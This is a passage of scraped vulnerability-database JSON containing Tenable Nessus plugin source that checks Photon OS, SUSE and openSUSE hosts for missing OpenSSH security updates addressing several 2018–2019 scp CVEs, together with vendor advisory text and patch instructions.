"cvelist": ["CVE-2019-12735", "CVE-2019-6110"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:openssh", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2019-1_0-0237_OPENSSH.NASL", "href": "https://www.tenable.com/plugins/nessus/126199", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2019-1.0-0237. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126199);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/06/26 10:34:07\");\n\n script_cve_id(\"CVE-2019-6110\");\n script_bugtraq_id(106358);\n\n script_name(english:\"Photon OS 1.0: Openssh PHSA-2019-1.0-0237\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the openssh package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-237.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-12735\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"openssh-7.4p1-10.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"openssh-debuginfo-7.4p1-10.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-14T06:16:53", "description": "This update for openssh fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-20685: Fixed an issue where scp client allows remote SSH\nservers to bypass intended access restrictions (bsc#1121571)\n\nCVE-2019-6109: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate terminal output via the\nobject name, e.g. by inserting ANSI escape sequences (bsc#1121816)\n\nCVE-2019-6110: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate stderr output, e.g. by\ninserting ANSI escape sequences (bsc#1121818)\n\nCVE-2019-6111: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to execute directory traversal attacks\nand overwrite files (bsc#1121821)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-01-22T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2019:0132-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-22T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:openssh", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers", "p-cpe:/a:novell:suse_linux:openssh-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-fips", "p-cpe:/a:novell:suse_linux:openssh-debugsource"], "id": "SUSE_SU-2019-0132-1.NASL", "href": "https://www.tenable.com/plugins/nessus/121300", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0132-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121300);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-20685\", \"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2019:0132-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for openssh fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-20685: Fixed an issue where scp client allows remote SSH\nservers to bypass intended access restrictions (bsc#1121571)\n\nCVE-2019-6109: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate terminal output via the\nobject name, e.g. by inserting ANSI escape sequences (bsc#1121816)\n\nCVE-2019-6110: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate stderr output, e.g. by\ninserting ANSI escape sequences (bsc#1121818)\n\nCVE-2019-6111: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to execute directory traversal attacks\nand overwrite files (bsc#1121821)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-20685/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6109/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6110/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6111/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190132-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2f3bb078\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2019-132=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2019-132=1\n\nSUSE Linux Enterprise Server 12-SP4:zypper in -t patch\nSUSE-SLE-SERVER-12-SP4-2019-132=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2019-132=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2019-132=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2019-132=1\n\nSUSE Linux Enterprise Desktop 12-SP4:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP4-2019-132=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2019-132=1\n\nSUSE Enterprise Storage 4:zypper in -t patch SUSE-Storage-4-2019-132=1\n\nSUSE CaaS Platform ALL :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\n\nSUSE CaaS Platform 3.0 :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2019-132=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6111\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openssh-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openssh-askpass-gnome-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openssh-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openssh-debugsource-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openssh-fips-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openssh-helpers-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openssh-helpers-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-askpass-gnome-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-debugsource-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-fips-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-helpers-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-helpers-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openssh-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openssh-askpass-gnome-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openssh-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openssh-debugsource-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openssh-fips-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openssh-helpers-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openssh-helpers-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"openssh-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"openssh-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"openssh-debugsource-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"openssh-helpers-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"openssh-helpers-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-debugsource-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-helpers-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-helpers-debuginfo-7.2p2-74.35.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-20T12:54:32", "description": "This update for openssh fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2018-20685: Fixed an issue where scp client allows\n remote SSH servers to bypass intended access\n restrictions (bsc#1121571)\n\n - CVE-2019-6109: Fixed an issue where the scp client would\n allow malicious remote SSH servers to manipulate\n terminal output via the object name, e.g. by inserting\n ANSI escape sequences (bsc#1121816)\n\n - CVE-2019-6110: Fixed an issue where the scp client would\n allow malicious remote SSH servers to manipulate stderr\n output, e.g. by inserting ANSI escape sequences\n (bsc#1121818)\n\n - CVE-2019-6111: Fixed an issue where the scp client would\n allow malicious remote SSH servers to execute directory\n traversal attacks and overwrite files (bsc#1121821)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.", "edition": 13, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-01-30T00:00:00", "title": "openSUSE Security Update : openssh (openSUSE-2019-93)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-30T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:opensuse:openssh-cavs-debuginfo", "p-cpe:/a:novell:opensuse:openssh-askpass-gnome", "p-cpe:/a:novell:opensuse:openssh-debuginfo", "p-cpe:/a:novell:opensuse:openssh", "p-cpe:/a:novell:opensuse:openssh-debugsource", "p-cpe:/a:novell:opensuse:openssh-helpers", "p-cpe:/a:novell:opensuse:openssh-cavs", "p-cpe:/a:novell:opensuse:openssh-helpers-debuginfo", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:openssh-fips"], "id": "OPENSUSE-2019-93.NASL", "href": "https://www.tenable.com/plugins/nessus/121460", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-93.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121460);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-20685\", \"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n\n script_name(english:\"openSUSE Security Update : openssh (openSUSE-2019-93)\");\n script_summary(english:\"Check for the openSUSE-2019-93 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2018-20685: Fixed an issue where scp client allows\n remote SSH servers to bypass intended access\n restrictions (bsc#1121571)\n\n - CVE-2019-6109: Fixed an issue where the scp client would\n allow malicious remote SSH servers to manipulate\n terminal output via the object name, e.g. by inserting\n ANSI escape sequences (bsc#1121816)\n\n - CVE-2019-6110: Fixed an issue where the scp client would\n allow malicious remote SSH servers to manipulate stderr\n output, e.g. by inserting ANSI escape sequences\n (bsc#1121818)\n\n - CVE-2019-6111: Fixed an issue where the scp client would\n allow malicious remote SSH servers to execute directory\n traversal attacks and overwrite files (bsc#1121821)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121821\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6111\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-cavs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-cavs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-askpass-gnome-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-cavs-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-cavs-debuginfo-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-debuginfo-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-debugsource-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-fips-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-helpers-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-helpers-debuginfo-7.2p2-29.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh-askpass-gnome / openssh-askpass-gnome-debuginfo / openssh / etc\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-02-01T03:09:07", "description": "The remote host is affected by the vulnerability described in GLSA-201903-16\n(OpenSSH: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in OpenSSH. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could overwrite arbitrary files, transfer malicious\n files, or gain unauthorized access.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 18, "cvss3": {"score": 